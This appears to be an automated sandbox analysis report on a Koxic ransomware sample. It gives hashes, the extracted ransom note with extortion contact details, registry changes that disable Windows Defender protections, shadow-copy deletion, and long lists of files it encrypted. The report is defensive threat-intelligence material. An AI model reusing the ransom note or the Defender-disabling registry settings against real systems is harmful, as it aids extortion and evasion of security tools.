koxic | 7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9

Resubmissions

11-10-2022 09:19

221011-laklssfgd6 10

18-04-2022 20:28

220418-y9cfpahad5 10

Analysis

max time kernel
49s
max time network
63s
platform
windows10_x64
resource
win10-20220414-en
submitted
18-04-2022 20:28

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
Size

379KB
MD5

5a44e1d5691ec9395281123ea0bd501f
SHA1

64566d5049479227d2eff3d983b127c0339974cd
SHA256

7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9
SHA512

55d85e77f70f25bae6cf8bbf5dd787d5771c2e38e99461b608f6375be9cb0b1031f3c0268b82eb03db05eb88ce37d5f37afbfc69ab0c4f90791a706013b168c8

Score

10^/10

koxic evasion ransomware trojan

Malware Config

Extracted

Path

C:\Documents and Settings\WANNA_RECOVER_KOXIC_FILEZ_NOLUQ.txt

Ransom Note

Hello, all your important files are encrypted and sensitive data leaked. To decrypt your files and avoid other unpleasant things you need to buy special decryption tool. Contact us via [email protected] or [email protected] and tell your UserID. This is the only way to decrypt your files and avoid publi? disclosure of data . Do not try to use third party software (it may corrupt your files). We respect black market rules. We can confirm the ability to decrypt your files (and of course the evidence of the leak ), Send us several unimportant files (do not try to deceive us). Your UserID (send it to us for decryption): AF7C33B3B2D184C5D695C67050D6213B33F377064386348CB2C35558D9A2E30E6D4FD9C3BDFE4F5860343600F0F2768DA09A97952A76B932BD30A04EB39BBCCBBB02A1A74D6379E38198DB521395F877A5EB5DCCCC8060F39545EAA65AE2AF84D7B942C4F53737E38104CA53BE5B669530BAA4B2497B376378B57771999470AC92411ED7C73A64C15475B544984C186D7A3D1AAAEDE970F49AD7DA007CF59568ECD07CE6BCCE59FB2B786FE2E1CE015BC1EDC66FB910701A6E0271A75D87F55539CF001A73AA7C5954977811DE8D79282B89CC749108834D2287A2952F82E50755F0C03BD17F98A25EF9948C96CE59D20F05E68FE8BE5CF8D47603752FB26B433082010A0282010100D7D7C256EBD2730D0F922F1007534F794C504965D2D9C9F189C804868734D568D6F334444918C25C7826D8E3C3585605C7D035B3636CE2AD2530ADEF22F7D355BBF36B4942E7E8BA6F6962678ACAA73F1C09DE5AB0F1FA25C1D99DD3A003271C054586F79D0BFE8D0C41D0A4DEA611D2EA81A905E910EC7A06A6DB5895BE0AFB680EFA0E2348AD9086E7D9BD8150EBD457C7546E3BD4359C16CA06526495ECC3BBB1B9C4657705B7E17E87AAF2C64F6B42B51ACB237615993CB2F7D579046C7D1A14D411559AE18B02E8B63B46575C0BD7DFC3409761BFC28DDE50E3CE9FC96C05E1185740A88CE251FA1F824C8EBB7D81A0D6895E24224E330EB03491FFE84302030100014F64155C4E31A7387135C32310BD519F4E4F4C5551

Emails

[email protected]

Signatures

Koxic
A C++ written ransomware first seen in late 2021.
ransomware koxic
Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490
Disables taskbar notifications via registry modification
evasion

Modifies extensions of user files 6 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

description	ioc	Process
File renamed	C:\Users\Admin\Pictures\SaveDisconnect.crw => C:\Users\Admin\Pictures\SaveDisconnect.crw.KOXIC_NOLUQ	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
File opened for modification	C:\Users\Admin\Pictures\SaveDisconnect.crw.KOXIC_NOLUQ	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
File renamed	C:\Users\Admin\Pictures\UpdateOptimize.png => C:\Users\Admin\Pictures\UpdateOptimize.png.KOXIC_NOLUQ	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
File opened for modification	C:\Users\Admin\Pictures\UpdateOptimize.png.KOXIC_NOLUQ	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
File renamed	C:\Users\Admin\Pictures\SendUnpublish.tiff => C:\Users\Admin\Pictures\SendUnpublish.tiff.KOXIC_NOLUQ	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
File opened for modification	C:\Users\Admin\Pictures\SendUnpublish.tiff.KOXIC_NOLUQ	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe

Windows security modification 2 TTPs 8 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet\SubmitSamplesConsent = "2"	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\UX Configuration	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\UX Configuration\NotificationSuppress = "1"	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtectione = "0"	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet\DisableBlockAtFirstSeen = "1"	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet\LocalSettingOverrideSpynetReporting = "0"	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\WordVL_MAK-ppd.xrm-ms.KOXIC_NOLUQ	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
File created	C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\SecondaryTiles\Home\WANNA_RECOVER_KOXIC_FILEZ_NOLUQ.txt	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\fr-ma\WANNA_RECOVER_KOXIC_FILEZ_NOLUQ.txt	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\email\dc_logo.png.KOXIC_NOLUQ	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\Outlook2019R_OEM_Perp-ul-phn.xrm-ms.KOXIC_NOLUQ	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessR_OEM_Perp3-ul-phn.xrm-ms.KOXIC_NOLUQ	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-netbeans-api-visual.xml.KOXIC_NOLUQ	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.simpleconfigurator.manipulator.nl_zh_4.4.0.v20140623020002.jar.KOXIC_NOLUQ	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
File created	C:\Program Files\Internet Explorer\ja-JP\WANNA_RECOVER_KOXIC_FILEZ_NOLUQ.txt	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
File opened for modification	C:\Program Files\7-Zip\Lang\hi.txt.KOXIC_NOLUQ	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\Fonts\private\MSUIGHUR.TTF.KOXIC_NOLUQ	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\http\requests\status.xml.KOXIC_NOLUQ	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\RTC.der.KOXIC_NOLUQ	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\themes\dark\bg_pattern_RHP.png.KOXIC_NOLUQ	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\ar-ae\WANNA_RECOVER_KOXIC_FILEZ_NOLUQ.txt	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
File opened for modification	C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Functions\InModuleScope.Tests.ps1.KOXIC_NOLUQ	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\jre\lib\management\jmxremote.access.KOXIC_NOLUQ	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\bn\LC_MESSAGES\vlc.mo.KOXIC_NOLUQ	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\pt_BR\LC_MESSAGES\vlc.mo.KOXIC_NOLUQ	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\VBA\VBA7.1\1033\VBCN6.CHM.KOXIC_NOLUQ	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Getstarted_4.5.6.0_x64__8wekyb3d8bbwe\Content\holoLens\en-US\toc.xml	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
File created	C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WANNA_RECOVER_KOXIC_FILEZ_NOLUQ.txt	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\jre\lib\jce.jar.KOXIC_NOLUQ	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Getstarted_4.5.6.0_x64__8wekyb3d8bbwe\Content\holoLens\en-US\doc_offline_wifi.xml	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\en-us\CT_ROOTS.XML	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\sl-si\WANNA_RECOVER_KOXIC_FILEZ_NOLUQ.txt	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\nb-no\WANNA_RECOVER_KOXIC_FILEZ_NOLUQ.txt	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019R_OEM_Perp4-ul-phn.xrm-ms.KOXIC_NOLUQ	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
File created	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Analysis Services\AS OLEDB\140\Resources\1033\WANNA_RECOVER_KOXIC_FILEZ_NOLUQ.txt	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
File created	C:\Program Files\WindowsApps\Microsoft.Windows.Photos_16.511.8780.0_x64__8wekyb3d8bbwe\Assets\WANNA_RECOVER_KOXIC_FILEZ_NOLUQ.txt	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\en-il\WANNA_RECOVER_KOXIC_FILEZ_NOLUQ.txt	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\MobileAcrobatCard_Dark.pdf.KOXIC_NOLUQ	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\en-ae\ui-strings.js.KOXIC_NOLUQ	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
File created	C:\Program Files\WindowsApps\Microsoft.BingWeather_4.18.56.0_x64__8wekyb3d8bbwe\Configuration\WANNA_RECOVER_KOXIC_FILEZ_NOLUQ.txt	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\themes\dark\arrow-down.gif.KOXIC_NOLUQ	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\es-es\WANNA_RECOVER_KOXIC_FILEZ_NOLUQ.txt	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL082.XML.KOXIC_NOLUQ	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
File opened for modification	C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Snippets\It.snippets.ps1xml.KOXIC_NOLUQ	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\circle_2x.png.KOXIC_NOLUQ	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\VisioStdR_Retail-ul-oob.xrm-ms.KOXIC_NOLUQ	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\ADDINS\Power View Excel Add-in\Microsoft.Reporting.AdHoc.Shell.Bootstrapper.xap.KOXIC_NOLUQ	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
File created	C:\Program Files\WindowsApps\Microsoft.Getstarted_4.5.6.0_x64__8wekyb3d8bbwe\Content\images\en-US\WANNA_RECOVER_KOXIC_FILEZ_NOLUQ.txt	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\OFFSYM.TTF.KOXIC_NOLUQ	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.jface.nl_zh_4.4.0.v20140623020002.jar.KOXIC_NOLUQ	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.core.nl_zh_4.4.0.v20140623020002.jar.KOXIC_NOLUQ	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\META-INF\ECLIPSE_.SF.KOXIC_NOLUQ	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\MSIPC\bg\msipc.dll.mui.KOXIC_NOLUQ	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
File created	C:\Program Files\VideoLAN\VLC\locale\ro\WANNA_RECOVER_KOXIC_FILEZ_NOLUQ.txt	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
File created	C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Arkadium.Win10.DailyChallenges\Assets\PrizeHistory\WANNA_RECOVER_KOXIC_FILEZ_NOLUQ.txt	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\back-arrow-default.svg.KOXIC_NOLUQ	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Multimedia\MPP\WANNA_RECOVER_KOXIC_FILEZ_NOLUQ.txt	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\VisioProVL_MAK-pl.xrm-ms.KOXIC_NOLUQ	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
File created	C:\Program Files\VideoLAN\VLC\lua\WANNA_RECOVER_KOXIC_FILEZ_NOLUQ.txt	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
File created	C:\Program Files\WindowsApps\Microsoft.Getstarted_4.5.6.0_x64__8wekyb3d8bbwe\Content\desktop\en-US\WANNA_RECOVER_KOXIC_FILEZ_NOLUQ.txt	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\delete.svg.KOXIC_NOLUQ	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\back-arrow-down.svg.KOXIC_NOLUQ	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\fr-ma\ui-strings.js.KOXIC_NOLUQ	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\ca-es\ui-strings.js.KOXIC_NOLUQ	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
File created	C:\Program Files\Microsoft Office\root\Office16\FPA_FA000000011\WANNA_RECOVER_KOXIC_FILEZ_NOLUQ.txt	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessR_Trial2-pl.xrm-ms.KOXIC_NOLUQ	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
File created	C:\Program Files\Common Files\System\msadc\ja-JP\WANNA_RECOVER_KOXIC_FILEZ_NOLUQ.txt	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\intf\modules\httprequests.luac.KOXIC_NOLUQ	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Wallet_1.0.16328.0_x64__8wekyb3d8bbwe\AppxMetadata\CodeIntegrity.cat	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
File created	C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\WANNA_RECOVER_KOXIC_FILEZ_NOLUQ.txt	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe

Gathers network information 2 TTPs 1 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command-Line Interface

T1059

pid	Process
1492	ipconfig.exe

Interacts with shadow copies 2 TTPs 1 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

pid	Process
4708	vssadmin.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
380	taskkill.exe

NTFS ADS 1 IoCs

description	ioc	Process
File created	C:\Program Files\WindowsApps\Microsoft.WindowsSoundRecorder_10.1702.301.0_x64__8wekyb3d8bbwe\Inbox.Shared.winmdC:\WANNA_RECOVER_KOXIC_FILEZ_NOLUQ.txt	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

pid	Process
5040	notepad.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
4032	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
536	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
536	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
536	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
536	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
536	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
536	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
536	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
536	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
536	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
536	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
536	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
536	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
536	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
536	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
536	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
536	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
536	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
536	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
536	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
536	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
536	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
536	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
536	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
536	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
536	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
536	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
536	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
536	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
536	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
536	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
536	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
536	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
536	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
536	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
536	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
536	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
536	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
536	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
536	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
536	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
536	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
536	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
536	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
536	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
536	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
536	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
536	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
536	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
536	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
536	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
536	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
536	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
536	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
536	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
536	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
536	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
536	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
